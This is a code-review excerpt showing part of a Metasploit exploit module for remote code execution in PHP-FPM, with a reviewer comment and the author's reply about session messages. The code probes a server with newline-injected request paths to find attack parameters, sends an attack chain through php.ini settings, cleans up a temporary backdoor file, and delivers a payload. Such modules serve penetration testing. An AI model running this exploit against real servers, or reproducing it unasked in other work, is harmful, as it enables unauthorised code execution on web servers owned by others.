modules/exploits/multi/http/php_fpm_rce.rb

```diff
@@ -0,0 +1,445 @@
+    return nil
+  end
+
+  def detect_qsl
+    qsl_candidates = []
+    (datastore['MinQSL']..datastore['MaxQSL']).step(datastore['QSLDetectStep']) do |qsl|
+      res = send_crafted_request(path: "/PHP\nabcdefghijklmopqrstuv.php", qsl: qsl)
+      unless res
+        vprint_error("Error when sending query with QSL=#{qsl}")
+        next
+      end
+      if res.code != @base_status
+        vprint_status("Status code #{res.code} for qsl=#{qsl}, adding as a candidate")
+        qsl_candidates << qsl
+      end
+    end
+    qsl_candidates
+  end
+
+  def check
+    print_status("Sending baseline query...")
+    res = send_crafted_request(path: "/path\ninfo.php")
+    return Exploit::CheckCode::Unknown("Error when sending baseline query") unless res
+    @base_status = res.code
+    vprint_status("Base status code is #{@base_status}")
+
+    if datastore['QSLHint']
+      print_status("Skipping qsl detection, using hint (qsl=#{datastore['QSLHint']})")
+      qsl_candidates = [datastore['QSLHint']]
+    else
+      print_status("Detecting QSL...")
+      qsl_candidates = detect_qsl
+    end
+    if qsl_candidates.empty?
+      return Exploit::CheckCode::Detected("No qsl candidates found, not vulnerable or something went wrong")
+    end
+    if qsl_candidates.size > datastore['MaxQSLCandidates']
+      return Exploit::CheckCode::Detected("Too many qsl candidates found, looks like I got banned")
+    end
+
+    print_good("The target is probably vulnerable. Possible QSLs: #{qsl_candidates}")
+
+    qsl_candidates = extend_qsl_list(qsl_candidates)
+    vprint_status("Extended QSL list: #{qsl_candidates}")
+
+    print_status("Doing sanity check...")
+    return Exploit::CheckCode::Detected('Sanity check failed') unless sanity_check?
+
+    print_status("Detecting attack parameters...")
+    @params = detect_params(qsl_candidates)
+    return Exploit::CheckCode::Detected('Unable to detect parameters') unless @params
+
+    print_good("Parameters found: QSL=#{@params[:qsl]}, customh_length=#{@params[:customh_length]}")
+    print_good("Target is vulnerable!")
+    Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
+    end
+    if @params[:qsl].nil? || @params[:customh_length].nil?
+      fail_with Failure::NotVulnerable, 'Attack parameters not found'
+    end
+
+    print_status("Performing attack using php.ini settings...")
+    if repeat_operation(:send_attack_chain)
+      print_good("Success! Was able to execute a command by appending '#{CHECK_COMMAND}'")
+    else
+      fail_with Failure::Unknown, 'Failed to send the attack chain'
+    end
+
+    print_status("Trying to cleanup /tmp/#{@filename}...")
+    if repeat_operation(:send_backdoor_cleanup)
+      print_good('Cleanup done!')
+    end
+
+    print_status("Sending payload...")
+    if repeat_operation(:send_payload)
+      print_good('Session created')
```

Comment:
Technically not all payloads result in a session being created even when they are successfully executed. I'd suggest changing this verbiage to be slightly more generic to be account under those edge-cases.

Reply:
Yes, I agree. After thinking more about this, there is no need for these messages. Also, the `fail_with` in the `else` statement is wrong if the payload does not create a session. So, I removed all of this.